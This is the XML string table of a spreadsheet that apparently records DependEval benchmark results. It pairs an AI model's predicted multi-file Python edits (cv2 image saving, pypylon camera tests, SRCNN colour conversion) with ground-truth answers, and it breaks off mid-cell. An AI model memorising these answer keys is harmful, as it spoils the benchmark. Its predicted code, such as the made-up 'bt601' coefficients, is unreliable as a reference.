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wiamlachqer/Library/Mobile Documents/com~apple~CloudDocs/Capstone/Multi-Agents-Systems-Benchmarking-for-Software-Engineering/DependEval/results/task1/python/claude-haiku-4-5-python/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{7F1C3BD4-3DAA-C143-B122-CBA741DD0824}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="2000" yWindow="980" windowWidth="15560" windowHeight="17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L6" i="1"/>
  <c r="K6" i="1"/>
  <c r="I2" i="1"/>
  <c r="H2" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="444" uniqueCount="443">
  <si>
    <t>idx</t>
  </si>
  <si>
    <t>pred</t>
  </si>
  <si>
    <t>gt</t>
  </si>
  <si>
    <t>input_tokens</t>
  </si>
  <si>
    <t>output_tokens</t>
  </si>
  <si>
    <t>total_tokens</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def cv2_show_image(window_name, image, size_wh=None, location_xy=None):\n    """Helper function for specifying window size and location when\n    displaying images with cv2.\n\n    Args:\n        window_name: str window name\n        image: ndarray image to display\n        size_wh: window size (w, h)\n        location_xy: window location (x, y)\n    """\n\n    if size_wh is not None:\n        cv2.namedWindow(window_name,\n                        cv2.WINDOW_KEEPRATIO | cv2.WINDOW_GUI_NORMAL)\n        cv2.resizeWindow(window_name, *size_wh)\n    else:\n        cv2.namedWindow(window_name, cv2.WINDOW_AUTOSIZE)\n\n    if location_xy is not None:\n        cv2.moveWindow(window_name, *location_xy)\n\n    cv2.imshow(window_name, image)', 'invoking_code_segment': 'vis_utils.cv2_show_image(\n                    key, image_jet,\n                    img_size, (img_x, img_y))', 'feature_description': 'Add an option to save the displayed images to disk. This feature allows users to optionally save images that are displayed using cv2_show_image to disk by specifying a save path parameter.', 'modified_complete_code': '# File 1: ip_basic/ip_basic/vis_utils.py\nimport cv2\nimport os\n\ndef cv2_show_image(window_name, image,\n                   size_wh=None, location_xy=None, save_path=None):\n    """Helper function for specifying window size and location when\n    displaying images with cv2.\n\n    Args:\n        window_name: str window name\n        image: ndarray image to display\n        size_wh: window size (w, h)\n        location_xy: window location (x, y)\n        save_path: #Modify optional file path to save the displayed image to disk\n    """\n\n    if size_wh is not None:\n        cv2.namedWindow(window_name,\n                        cv2.WINDOW_KEEPRATIO | cv2.WINDOW_GUI_NORMAL)\n        cv2.resizeWindow(window_name, *size_wh)\n    else:\n        cv2.namedWindow(window_name, cv2.WINDOW_AUTOSIZE)\n\n    if location_xy is not None:\n        cv2.moveWindow(window_name, *location_xy)\n\n    cv2.imshow(window_name, image)\n    \n    #New Save image to disk if save_path is provided\n    if save_path is not None:\n        os.makedirs(os.path.dirname(save_path), exist_ok=True)\n        cv2.imwrite(save_path, image)\n\n# File 2: ip_basic/demos/depth_completion.py\n# In the main() function, modify the section where cv2_show_image is called:\n\n# #Modify Add save_process_images option\nsave_process_images = True  #New option to control saving process images\n\n# In the loop where images are displayed:\nfor key, value in process_dict.items():\n    image_jet = cv2.applyColorMap(\n        np.uint8(value / np.amax(value) * 255),\n        cv2.COLORMAP_JET)\n    \n    #Modify Pass save_path parameter to cv2_show_image\n    save_img_path = None\n    if save_process_images:\n        save_img_path = \'process/\' + key + \'.png\'\n    \n    vis_utils.cv2_show_image(\n        key, image_jet,\n        img_size, (img_x, img_y), save_path=save_img_path)\n    \n    img_x += x_offset + x_padding\n    if (img_x + x_offset + x_padding) &gt; max_x:\n        img_x = x_start\n        row_idx += 1\n    img_y = y_start + row_idx * (y_offset + y_padding)\n    \n    #Modify Remove the separate cv2.imwrite call as it\'s now handled in cv2_show_image\n    # cv2.imwrite(\'process/\' + key + \'.png\', image_jet)  # This line can be removed\n\ncv2.waitKey()'}</t>
  </si>
  <si>
    <t>{'#file 1': 'import cv2\n\ndef cv2_show_image(window_name, image, size_wh=None, location_xy=None, save_path=None):\n    """Helper function for specifying window size and location when\n    displaying images with cv2.\n\n    Args:\n        window_name: str window name\n        image: ndarray image to display\n        size_wh: window size (w, h)\n        location_xy: window location (x, y)\n        save_path: str path to save the image\n    """\n\n    if size_wh is not None:\n        cv2.namedWindow(window_name,\n                        cv2.WINDOW_KEEPRATIO | cv2.WINDOW_GUI_NORMAL)\n        cv2.resizeWindow(window_name, *size_wh)\n    else:\n        cv2.namedWindow(window_name, cv2.WINDOW_AUTOSIZE)\n\n    if location_xy is not None:\n        cv2.moveWindow(window_name, *location_xy)\n\n    cv2.imshow(window_name, image)\n\n    if save_path is not None:\n        cv2.imwrite(save_path, image)', '#file 2': "if fill_type == 'multiscale' and show_process:\n            img_size = (570, 165)\n\n            x_start = 80\n            y_start = 50\n            x_offset = img_size[0]\n            y_offset = img_size[1]\n            x_padding = 0\n            y_padding = 28\n\n            img_x = x_start\n            img_y = y_start\n            max_x = 1900\n\n            row_idx = 0\n            for key, value in process_dict.items():\n\n                image_jet = cv2.applyColorMap(\n                    np.uint8(value / np.amax(value) * 255),\n                    cv2.COLORMAP_JET)\n                save_path = 'process/' + key + '.png'\n                vis_utils.cv2_show_image(\n                    key, image_jet,\n                    img_size, (img_x, img_y), save_path=save_path)\n\n                img_x += x_offset + x_padding\n                if (img_x + x_offset + x_padding) &gt; max_x:\n                    img_x = x_start\n                    row_idx += 1\n                img_y = y_start + row_idx * (y_offset + y_padding)\n\n            cv2.waitKey()"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class PylonEmuTestCase(unittest.TestCase):\n    num_dev = num\n    device_class, device_filter = get_class_and_filter()\n\n    def create_first(self):\n        tlf = pylon.TlFactory.GetInstance()\n        return pylon.InstantCamera(tlf.CreateFirstDevice(self.device_filter[0]))', 'invoking_code_segment': 'class InstantCameraArrayTestSuite(PylonEmuTestCase):\n    def test_constructor_empty(self):\n        cameraArray = pylon.InstantCameraArray()\n        self.assertEqual(0, cameraArray.GetSize())\n        # ... test methods using inherited PylonEmuTestCase', 'feature_description': 'Add a method to PylonEmuTestCase to create a list of InstantCamera objects for all available emulated devices. This method will enumerate all available devices matching the device filter and return a list of InstantCamera objects, enabling test cases to easily work with multiple cameras.', 'modified_complete_code': '# File 1: pypylon/tests/pylon_tests/emulated/pylonemutestcase.py\nimport unittest\nimport os\nimport sys\nnum = 3\nos.environ["PYLON_CAMEMU"] = "%d" % num\nfrom pypylon import pylon\n\ndef get_class_and_filter():\n    device_class = "BaslerCamEmu"\n    di = pylon.DeviceInfo()\n    di.SetDeviceClass(device_class)\n    return device_class, [di]\n\n\nclass PylonEmuTestCase(unittest.TestCase):\n    num_dev = num\n    device_class, device_filter = get_class_and_filter()\n\n    def create_first(self):\n        tlf = pylon.TlFactory.GetInstance()\n        return pylon.InstantCamera(tlf.CreateFirstDevice(self.device_filter[0]))\n\n    #New\n    def create_camera_list(self):\n        """Create a list of InstantCamera objects for all available emulated devices."""\n        tlf = pylon.TlFactory.GetInstance()\n        devices = tlf.EnumerateDevices(self.device_filter)\n        camera_list = []\n        for device_info in devices:\n            camera = pylon.InstantCamera(tlf.CreateDevice(device_info))\n            camera_list.append(camera)\n        return camera_list\n\n\n# File 2: pypylon/tests/pylon_tests/emulated/instantcameraarray_test.py\nfrom pylonemutestcase import PylonEmuTestCase\nfrom pypylon import pylon\nimport unittest\n\n\nclass InstantCameraArrayTestSuite(PylonEmuTestCase):\n    def test_constructor_empty(self):\n        cameraArray = pylon.InstantCameraArray()\n        self.assertEqual(0, cameraArray.GetSize())\n        self.assertFalse(cameraArray.IsGrabbing())\n        self.assertFalse(cameraArray.IsOpen())\n        self.assertFalse(cameraArray.IsPylonDeviceAttached())\n        self.assertFalse(cameraArray.IsCameraDeviceRemoved())\n        # Test if no Camera is connected\n        for cam in cameraArray:\n            self.fail()\n\n    def test_initialize(self):\n        cameraArray = pylon.InstantCameraArray()\n        self.assertEqual(0, cameraArray.GetSize())\n        cameraArray.Initialize(self.num_dev)\n        self.assertEqual(self.num_dev, cameraArray.GetSize())\n        v = 0\n        for cam in cameraArray:\n            v += 1\n        self.assertEqual(self.num_dev, v)\n\n    #New\n    def test_create_camera_list(self):\n        """Test the create_camera_list method."""\n        camera_list = self.create_camera_list()\n        self.assertEqual(len(camera_list), self.num_dev)\n        for camera in camera_list:\n            self.assertIsInstance(camera, pylon.InstantCamera)\n\n    def test_connect_cameras(self):\n        devices = pylon.TlFactory.GetInstance().EnumerateDevices(self.device_filter)\n        self.assertEqual(len(devices), self.num_dev)\n        cameraArray = pylon.InstantCameraArray(self.num_dev)\n        for i, cam in enumerate(cameraArray):\n            self.assertEqual(devices[i].GetDeviceClass(), self.device_class)\n            cam.Attach(pylon.TlFactory.GetInstance().CreateDevice(devices[i]))\n\n        self.assertEqual(self.num_dev, cameraArray.GetSize())\n        self.assertFalse(cameraArray.IsGrabbing())\n        self.assertFalse(cameraArray.IsOpen())\n        self.assertTrue(cameraArray.IsPylonDeviceAttached())\n        self.assertFalse(cameraArray.IsCameraDeviceRemoved())\n\n        cameraArray.Open()\n\n        self.assertEqual(self.num_dev, cameraArray.GetSize())\n        self.assertFalse(cameraArray.IsGrabbing())\n        self.assertTrue(cameraArray.IsOpen())\n        self.assertTrue(cameraArray.IsPylonDeviceAttached())\n        self.assertFalse(cameraArray.IsCameraDeviceRemoved())\n\n        cameraArray.StartGrabbing()\n\n        self.assertEqual(self.num_dev, cameraArray.GetSize())\n        self.assertTrue(cameraArray.IsGrabbing())\n        self.assertTrue(cameraArray.IsOpen())\n        self.assertTrue(cameraArray.IsPylonDeviceAttached())\n        self.assertFalse(cameraArray.IsCameraDeviceRemoved())\n\n        cameraArray.RetrieveResult(300)\n\n        self.assertEqual(self.num_dev, cameraArray.GetSize())\n        self.assertTrue(cameraArray.IsGrabbing())\n        self.assertTrue(cameraArray.IsOpen())\n        self.assertTrue(cameraArray.IsPylonDeviceAttached())\n        self.assertFalse(cameraArray.IsCameraDeviceRemoved())\n\n        cameraArray.StopGrabbing()\n\n        self.assertEqual(self.num_dev, cameraArray.GetSize())\n        self.assertFalse(cameraArray.IsGrabbing())\n        self.assertTrue(cameraArray.IsOpen())\n        self.assertTrue(cameraArray.IsPylonDeviceAttached())\n        self.assertFalse(cameraArray.IsCameraDeviceRemoved())\n\n        cameraArray.Close()\n\n        self.assertEqual(self.num_dev, cameraArray.GetSize())\n        self.assertFalse(cameraArray.IsGrabbing())\n        self.assertFalse(cameraArray.IsOpen())\n        self.assertTrue(cameraArray.IsPylonDeviceAttached())\n        self.assertFalse(cameraArray.IsCameraDeviceRemoved())\n\n        cameraArray.DestroyDevice()\n\n        self.assertEqual(self.num_dev, cameraArray.GetSize())\n        self.assertFalse(cameraArray.IsGrabbing())\n        self.assertFalse(cameraArray.IsOpen())\n        self.assertFalse(cameraArray.IsPylonDeviceAttached())\n        self.assertFalse(cameraArray.IsCameraDeviceRemoved())\n\n    def test_detach_cameras(self):\n\n        cameraArray = pylon.InstantCameraArray(self.num_dev)\n        devices = pylon.TlFactory.GetInstance().EnumerateDevices(self.device_filter)\n        self.assertEqual(len(devices), self.num_dev)\n        for i, cam in enumerate(cameraArray):\n            self.assertEqual(devices[i].GetDeviceClass(), self.device_class)\n            cam.Attach(pylon.TlFactory.GetInstance().CreateDevice(devices[i]))\n\n        cameraArray.Open()\n        cameraArray.StartGrabbing()\n        cameraArray.DetachDevice()\n        self.assertEqual(self.num_dev, cameraArray.GetSize())\n        self.assertFalse(cameraArray.IsGrabbing())\n        self.assertFalse(cameraArray.IsOpen())\n        self.assertFalse(cameraArray.IsPylonDeviceAttached())\n        self.assertFalse(cameraArray.IsCameraDeviceRemoved())\n\n\nif __name__ == "__main__":\n    unittest.main()'}</t>
  </si>
  <si>
    <t>{'pylonemutestcase.py': 'import unittest\nimport os\nimport sys\nnum = 3\nos.environ["PYLON_CAMEMU"] = "%d" % num\nfrom pypylon import pylon\n\ndef get_class_and_filter():\n    device_class = "BaslerCamEmu"\n    di = pylon.DeviceInfo()\n    di.SetDeviceClass(device_class)\n    return device_class, [di]\n\n\nclass PylonEmuTestCase(unittest.TestCase):\n    num_dev = num\n    device_class, device_filter = get_class_and_filter()\n\n    def create_first(self):\n        tlf = pylon.TlFactory.GetInstance()\n        return pylon.InstantCamera(tlf.CreateFirstDevice(self.device_filter[0]))\n\n    def create_all(self):\n        tlf = pylon.TlFactory.GetInstance()\n        devices = tlf.EnumerateDevices(self.device_filter)\n        return [pylon.InstantCamera(tlf.CreateDevice(dev)) for dev in devices]', 'instantcameraarray_test.py': 'from pylonemutestcase import PylonEmuTestCase\nfrom pypylon import pylon\nimport unittest\n\n\nclass InstantCameraArrayTestSuite(PylonEmuTestCase):\n    def test_constructor_empty(self):\n        cameraArray = pylon.InstantCameraArray()\n        self.assertEqual(0, cameraArray.GetSize())\n        self.assertFalse(cameraArray.IsGrabbing())\n        self.assertFalse(cameraArray.IsOpen())\n        self.assertFalse(cameraArray.IsPylonDeviceAttached())\n        self.assertFalse(cameraArray.IsCameraDeviceRemoved())\n        # Test if no Camera is connected\n        for cam in cameraArray:\n            self.fail()\n\n    def test_initialize(self):\n        cameraArray = pylon.InstantCameraArray()\n        self.assertEqual(0, cameraArray.GetSize())\n        cameraArray.Initialize(self.num_dev)\n        self.assertEqual(self.num_dev, cameraArray.GetSize())\n        v = 0\n        for cam in cameraArray:\n            v += 1\n        self.assertEqual(self.num_dev, v)\n\n    def test_connect_cameras(self):\n        cameras = self.create_all()\n        cameraArray = pylon.InstantCameraArray(self.num_dev)\n        for i, cam in enumerate(cameraArray):\n            cam.Attach(cameras[i].GetDevice())\n\n        self.assertEqual(self.num_dev, cameraArray.GetSize())\n        self.assertFalse(cameraArray.IsGrabbing())\n        self.assertFalse(cameraArray.IsOpen())\n        self.assertTrue(cameraArray.IsPylonDeviceAttached())\n        self.assertFalse(cameraArray.IsCameraDeviceRemoved())\n\n        cameraArray.Open()\n\n        self.assertEqual(self.num_dev, cameraArray.GetSize())\n        self.assertFalse(cameraArray.IsGrabbing())\n        self.assertTrue(cameraArray.IsOpen())\n        self.assertTrue(cameraArray.IsPylonDeviceAttached())\n        self.assertFalse(cameraArray.IsCameraDeviceRemoved())\n\n        cameraArray.StartGrabbing()\n\n        self.assertEqual(self.num_dev, cameraArray.GetSize())\n        self.assertTrue(cameraArray.IsGrabbing())\n        self.assertTrue(cameraArray.IsOpen())\n        self.assertTrue(cameraArray.IsPylonDeviceAttached())\n        self.assertFalse(cameraArray.IsCameraDeviceRemoved())\n\n        cameraArray.RetrieveResult(300)\n\n        self.assertEqual(self.num_dev, cameraArray.GetSize())\n        self.assertTrue(cameraArray.IsGrabbing())\n        self.assertTrue(cameraArray.IsOpen())\n        self.assertTrue(cameraArray.IsPylonDeviceAttached())\n        self.assertFalse(cameraArray.IsCameraDeviceRemoved())\n\n        cameraArray.StopGrabbing()\n\n        self.assertEqual(self.num_dev, cameraArray.GetSize())\n        self.assertFalse(cameraArray.IsGrabbing())\n        self.assertTrue(cameraArray.IsOpen())\n        self.assertTrue(cameraArray.IsPylonDeviceAttached())\n        self.assertFalse(cameraArray.IsCameraDeviceRemoved())\n\n        cameraArray.Close()\n\n        self.assertEqual(self.num_dev, cameraArray.GetSize())\n        self.assertFalse(cameraArray.IsGrabbing())\n        self.assertFalse(cameraArray.IsOpen())\n        self.assertTrue(cameraArray.IsPylonDeviceAttached())\n        self.assertFalse(cameraArray.IsCameraDeviceRemoved())\n\n        cameraArray.DestroyDevice()\n\n        self.assertEqual(self.num_dev, cameraArray.GetSize())\n        self.assertFalse(cameraArray.IsGrabbing())\n        self.assertFalse(cameraArray.IsOpen())\n        self.assertFalse(cameraArray.IsPylonDeviceAttached())\n        self.assertFalse(cameraArray.IsCameraDeviceRemoved())\n\n    def test_detach_cameras(self):\n\n        cameraArray = pylon.InstantCameraArray(self.num_dev)\n        devices = pylon.TlFactory.GetInstance().EnumerateDevices(self.device_filter)\n        self.assertEqual(len(devices), self.num_dev)\n        for i, cam in enumerate(cameraArray):\n            self.assertEqual(devices[i].GetDeviceClass(), self.device_class)\n            cam.Attach(pylon.TlFactory.GetInstance().CreateDevice(devices[i]))\n\n        cameraArray.Open()\n        cameraArray.StartGrabbing()\n        cameraArray.DetachDevice()\n        self.assertEqual(self.num_dev, cameraArray.GetSize())\n        self.assertFalse(cameraArray.IsGrabbing())\n        self.assertFalse(cameraArray.IsOpen())\n        self.assertFalse(cameraArray.IsPylonDeviceAttached())\n        self.assertFalse(cameraArray.IsCameraDeviceRemoved())\n\n\nif __name__ == "__main__":\n    unittest.main()'}</t>
  </si>
  <si>
    <t>{'called_code_segment': "def convert_rgb_to_y(img):\n    if type(img) == np.ndarray:\n        return 16. + (64.738 * img[:, :, 0] + 129.057 * img[:, :, 1] + 25.064 * img[:, :, 2]) / 256.\n    elif type(img) == torch.Tensor:\n        if len(img.shape) == 4:\n            img = img.squeeze(0)\n        return 16. + (64.738 * img[0, :, :] + 129.057 * img[1, :, :] + 25.064 * img[2, :, :]) / 256.\n    else:\n        raise Exception('Unknown Type', type(img))", 'invoking_code_segment': 'hr = convert_rgb_to_y(hr)\nlr = convert_rgb_to_y(lr)', 'feature_description': 'Add an option to convert RGB to Y using a different formula (BT.601 standard alternative). This allows users to choose between the default formula and an alternative formula by passing a formula_type parameter.', 'modified_complete_code': '# SRCNN-pytorch/utils.py\nimport torch\nimport numpy as np\n\n\n#Modify\ndef convert_rgb_to_y(img, formula_type=\'default\'):\n    """Convert RGB image to Y channel.\n    \n    Args:\n        img: Input image (numpy array or torch tensor)\n        formula_type: \'default\' for standard formula or \'bt601\' for BT.601 alternative\n    """\n    if formula_type == \'default\':\n        coefficients = {\'r\': 64.738, \'g\': 129.057, \'b\': 25.064, \'offset\': 16.}\n    elif formula_type == \'bt601\':\n        #New\n        coefficients = {\'r\': 76.245, \'g\': 149.685, \'b\': 29.070, \'offset\': 0.}\n    else:\n        raise ValueError(f"Unknown formula_type: {formula_type}")\n    \n    if type(img) == np.ndarray:\n        return coefficients[\'offset\'] + (coefficients[\'r\'] * img[:, :, 0] + coefficients[\'g\'] * img[:, :, 1] + coefficients[\'b\'] * img[:, :, 2]) / 256.\n    elif type(img) == torch.Tensor:\n        if len(img.shape) == 4:\n            img = img.squeeze(0)\n        return coefficients[\'offset\'] + (coefficients[\'r\'] * img[0, :, :] + coefficients[\'g\'] * img[1, :, :] + coefficients[\'b\'] * img[2, :, :]) / 256.\n    else:\n        raise Exception(\'Unknown Type\', type(img))\n\n\ndef convert_rgb_to_ycbcr(img):\n    if type(img) == np.ndarray:\n        y = 16. + (64.738 * img[:, :, 0] + 129.057 * img[:, :, 1] + 25.064 * img[:, :, 2]) / 256.\n        cb = 128. + (-37.945 * img[:, :, 0] - 74.494 * img[:, :, 1] + 112.439 * img[:, :, 2]) / 256.\n        cr = 128. + (112.439 * img[:, :, 0] - 94.154 * img[:, :, 1] - 18.285 * img[:, :, 2]) / 256.\n        return np.array([y, cb, cr]).transpose([1, 2, 0])\n    elif type(img) == torch.Tensor:\n        if len(img.shape) == 4:\n            img = img.squeeze(0)\n        y = 16. + (64.738 * img[0, :, :] + 129.057 * img[1, :, :] + 25.064 * img[2, :, :]) / 256.\n        cb = 128. + (-37.945 * img[0, :, :] - 74.494 * img[1, :, :] + 112.439 * img[2, :, :]) / 256.\n        cr = 128. + (112.439 * img[0, :, :] - 94.154 * img[1, :, :] - 18.285 * img[2, :, :]) / 256.\n        return torch.cat([y, cb, cr], 0).permute(1, 2, 0)\n    else:\n        raise Exception(\'Unknown Type\', type(img))\n\n\ndef convert_ycbcr_to_rgb(img):\n    if type(img) == np.ndarray:\n        r = 298.082 * img[:, :, 0] / 256. + 408.583 * img[:, :, 2] / 256. - 222.921\n        g = 298.082 * img[:, :, 0] / 256. - 100.291 * img[:, :, 1] / 256. - 208.120 * img[:, :, 2] / 256. + 135.576\n        b = 298.082 * img[:, :, 0] / 256. + 516.412 * img[:, :, 1] / 256. - 276.836\n        return np.array([r, g, b]).transpose([1, 2, 0])\n    elif type(img) == torch.Tensor:\n        if len(img.shape) == 4:\n            img = img.squeeze(0)\n        r = 298.082 * img[0, :, :] / 256. + 408.583 * img[2, :, :] / 256. - 222.921\n        g = 298.082 * img[0, :, :] / 256. - 100.291 * img[1, :, :] / 256. - 208.120 * img[2, :, :] / 256. + 135.576\n        b = 298.082 * img[0, :, :] / 256. + 516.412 * img[1, :, :] / 256. - 276.836\n        return torch.cat([r, g, b], 0).permute(1, 2, 0)\n    else:\n        raise Exception(\'Unknown Type\', type(img))\n\n\ndef calc_psnr(img1, img2):\n    return 10. * torch.log10(1. / torch.mean((img1 - img2) ** 2))\n\n\nclass AverageMeter(object):\n    def __init__(self):\n        self.reset()\n\n    def reset(self):\n        self.val = 0\n        self.avg = 0\n        self.sum = 0\n        self.count = 0\n\n    def update(self, val, n=1):\n        self.val = val\n        self.sum += val * n\n        self.count += n\n        self.avg = self.sum / self.count\n\n\n# SRCNN-pytorch/prepare.py\nimport argparse\nimport glob\nimport h5py\nimport numpy as np\nimport PIL.Image as pil_image\nfrom utils import convert_rgb_to_y\n\n\n#Modify\ndef train(args):\n    h5_file = h5py.File(args.output_path, \'w\')\n\n    lr_patches = []\n    hr_patches = []\n\n    for image_path in sorted(glob.glob(\'{}/*\'.format(args.images_dir))):\n        hr = pil_image.open(image_path).convert(\'RGB\')\n        hr_width = (hr.width // args.scale) * args.scale\n        hr_height = (hr.height // args.scale) * args.scale\n        hr = hr.resize((hr_width, hr_height), resample=pil_image.BICUBIC)\n        lr = hr.resize((hr_width // args.scale, hr_height // args.scale), resample=pil_image.BICUBIC)\n        lr = lr.resize((lr.width * args.scale, lr.height * args.scale), resample=pil_image.BICUBIC)\n        hr = np.array(hr).astype(np.float32)\n        lr = np.array(lr).astype(np.float32)\n        #Modify\n        hr = convert_rgb_to_y(hr, formula_type=args.formula_type)\n        lr = convert_rgb_to_y(lr, formula_type=args.formula_type)\n\n        for i in range(0, lr.shape[0] - args.patch_size + 1, args.stride):\n            for j in range(0, lr.shape[1] - args.patch_size + 1, args.stride):\n                lr_patches.append(lr[i:i + args.patch_size, j:j + args.patch_size])\n                hr_patches.append(hr[i:i + args.patch_size, j:j + args.patch_size])\n\n    lr_patches = np.array(lr_patches)\n    hr_patches = np.array(hr_patches)\n\n    h5_file.create_dataset(\'lr\', data=lr_patches)\n    h5_file.create_dataset(\'hr\', data=hr_patches)\n\n    h5_file.close()\n\n\n#Modify\ndef eval(args):\n    h5_file = h5py.File(args.output_path, \'w\')\n\n    lr_group = h5_file.create_group(\'lr\')\n    hr_group = h5_file.create_group(\'hr\')\n\n    for i, image_path in enumerate(sorted(glob.glob(\'{}/*\'.format(args.images_dir)))):\n        hr = pil_image.open(image_path).convert(\'RGB\')\n        hr_width = (hr.width // args.scale) * args.scale\n        hr_height = (hr.height // args.scale) * args.scale\n        hr = hr.resize((hr_width, hr_height), resample=pil_image.BICUBIC)\n        lr = hr.resize((hr_width // args.scale, hr_height // args.scale), resample=pil_image.BICUBIC)\n        lr = lr.resize((lr.width * args.scale, lr.height * args.scale), resample=pil_image.BICUBIC)\n        hr = np.array(hr).astype(np.float32)\n        lr = np.array(lr).astype(np.float32)\n        #Modify\n        hr = convert_rgb_to_y(hr, formula_type=args.formula_type)\n        lr = convert_rgb_to_y(lr, formula_type=args.formula_type)\n\n        lr_group.create_dataset(str(i), data=lr)\n        hr_group.create_dataset(str(i), data=hr)\n\n    h5_file.close()\n\n\nif __name__ == \'__main__\':\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\'--images-dir\', type=str, required=True)\n    parser.add_argument(\'--output-path\', type=str, required=True)\n    parser.add_argument(\'--patch-size\', type=int, default=33)\n    parser.add_argument(\'--stride\', type=int, default=14)\n    parser.add_argument(\'--scale\', type=int, default=2)\n    #New\n    parser.add_argument(\'--formula-type\', type=str, default=\'default\', choices=[\'default\', \'bt601\'], help=\'RGB to Y conversion formula\')\n    parser.add_argument(\'--eval\', action=\'store_true\')\n    args = parser.parse_args()\n\n    if not args.eval:\n        train(args)\n    else:\n        eval(args)'}</t>
  </si>
  <si>
    <t>{'utils.py': "import torch\nimport numpy as np\n\ndef convert_rgb_to_y(img, formula='default'):\n    if formula == 'default':\n        if type(img) == np.ndarray:\n            return 16. + (64.738 * img[:, :, 0] + 129.057 * img[:, :, 1] + 25.064 * img[:, :, 2]) / 256.\n        elif type(img) == torch.Tensor:\n            if len(img.shape) == 4:\n                img = img.squeeze(0)\n            return 16. + (64.738 * img[0, :, :] + 129.057 * img[1, :, :] + 25.064 * img[2, :, :]) / 256.\n    elif formula == 'alternative':\n        if type(img) == np.ndarray:\n            return 16. + (65.481 * img[:, :, 0] + 128.553 * img[:, :, 1] + 24.966 * img[:, :, 2]) / 256.\n        elif type(img) == torch.Tensor:\n            if len(img.shape) == 4:\n                img = img.squeeze(0)\n            return 16. + (65.481 * img[0, :, :] + 128.553 * img[1, :, :] + 24.966 * img[2, :, :]) / 256.\n    else:\n        raise Exception('Unknown Type', type(img))\n\ndef convert_rgb_to_ycbcr(img):\n    if type(img) == np.ndarray:\n        y = 16. + (64.738 * img[:, :, 0] + 129.057 * img[:, :, 1] + 25.064 * img[:, :, 2]) / 256.\n        cb = 128. + (-37.945 * img[:, :, 0] - 74.494 * img[:, :, 1] + 112.439 * img[:, :, 2]) / 256.\n        cr = 128. + (112.439 * img[:, :, 0] - 94.154 * img[:, :, 1] - 18.285 * img[:, :, 2]) / 256.\n        return np.array([y, cb, cr]).transpose([1, 2, 0])\n    elif type(img) == torch.Tensor:\n        if len(img.shape) == 4:\n            img = img.squeeze(0)\n        y = 16. + (64.738 * img[0, :, :] + 129.057 * img[1, :, :] + 25.064 * img[2, :, :]) / 256.\n        cb = 128. + (-37.945 * img[0, :, :] - 74.494 * img[1, :, :] + 112.439 * img[2, :, :]) / 256.\n        cr = 128. + (112.439 * img[0, :, :] - 94.154 * img[1, :, :] - 18.285 * img[2, :, :]) / 256.\n        return torch.cat([y, cb, cr], 0).permute(1, 2, 0)\n    else:\n        raise Exception('Unknown Type', type(img))\n\ndef convert_ycbcr_to_rgb(img):\n    if type(img) == np.ndarray:\n        r = 298.082 * img[:, :, 0] / 256. + 408.583 * img[:, :, 2] / 256. - 222.921\n        g = 298.082 * img[:, :, 0] / 256. - 100.291 * img[:, :, 1] / 256. - 208.120 * img[:, :, 2] / 256. + 135.576\n        b = 298.082 * img[:, :, 0] / 256. + 516.412 * img[:, :, 1] / 256. - 276.836\n        return np.array([r, g, b]).transpose([1, 2, 0])\n    elif type(img) == torch.Tensor:\n        if len(img.shape) == 4:\n            img = img.squeeze(0)\n        r = 298.082 * img[0, :, :] / 256. + 408.583 * img[2, :, :] / 256. - 222.921\n        g = 298.082 * img[0, :, :] / 256. - 100.291 * img[1, :, :] / 256. - 208.120 * img[2, :, :] / 256. + 135.576\n        b = 298.082 * img[0, :, :] / 256. + 516.412 * img[1, :, :] / 256. - 276.836\n        return torch.cat([r, g, b], 0).permute(1, 2, 0)\n    else:\n        raise Exception('Unknown Type', type(img))\n\ndef calc_psnr(img1, img2):\n    return 10. * torch.log10(1. / torch.mean((img1 - img2) ** 2))\n\nclass AverageMeter(object):\n    def __init__(self):\n        self.reset()\n\n    def reset(self):\n        self.val = 0\n        self.avg = 0\n        self.sum = 0\n        self.count = 0\n\n    def update(self, val, n=1):\n        self.val = val\n        self.sum += val * n\n        self.count += n\n        self.avg = self.sum / self.count", 'prepare.py': "import argparse\nimport glob\nimport h5py\nimport numpy as np\nimport PIL.Image as pil_image\nfrom utils import convert_rgb_to_y\n\ndef train(args):\n    h5_file = h5py.File(args.output_path, 'w')\n\n    lr_patches = []\n    hr_patches = []\n\n    for image_path in sorted(glob.glob('{}/*'.format(args.images_dir))):\n        hr = pil_image.open(image_path).convert('RGB')\n        hr_width = (hr.width // args.scale) * args.scale\n        hr_height = (hr.height // args.scale) * args.scale\n        hr = hr.resize((hr_width, hr_height), resample=pil_image.BICUBIC)\n        lr = hr.resize((hr_width // args.scale, hr_height // args.scale), resample=pil_image.BICUBIC)\n        lr = lr.resize((lr.width * args.scale, lr.height * args.scale), resample=pil_image.BICUBIC)\n        hr = np.array(hr).astype(np.float32)\n        lr = np.array(lr).astype(np.float32)\n        hr = convert_rgb_to_y(hr, formula='default')\n        lr = convert_rgb_to_y(lr, formula='default')\n\n        for i in range(0, lr.shape[0] - args.patch_size + 1, args.stride):\n            for j in range(0, lr.shape[1] - args.patch_size + 1, args.stride):\n                lr_patches.append(lr[i:i + args.patch_size, j:j + args.patch_size])\n                hr_patches.append(hr[i:i + args.patch_size, j:j + args.patch_size])\n\n    lr_patches = np.array(lr_patches)\n    hr_patches = np.array(hr_patches)\n\n    h5_file.create_dataset('lr', data=lr_patches)\n    h5_file.create_dataset('hr', data=hr_patches)\n\n    h5_file.close()\n\ndef eval(args):\n    h5_file = h5py.File(args.output_path, 'w')\n\n    lr_group = h5_file.create_group('lr')\n    hr_group = h5_file.create_group('hr')\n\n    for i, image_path in enumerate(sorted(glob.glob('{}/*'.format(args.images_dir)))):\n        hr = pil_image.open(image_path).convert('RGB')\n        hr_width = (hr.width // args.scale) * args.scale\n        hr_height = (hr.height // args.scale) * args.scale\n        hr = hr.resize((hr_width, hr_height), resample=pil_image.BICUBIC)\n        lr = hr.resize((hr_width // args.scale, hr_height // args.scale), resample=pil_image.BICUBIC)\n        lr = lr.resize((lr.width * args.scale, lr.height * args.scale), resample=pil_image.BICUBIC)\n        hr = np.array(hr).astype(np.float32)\n        lr = 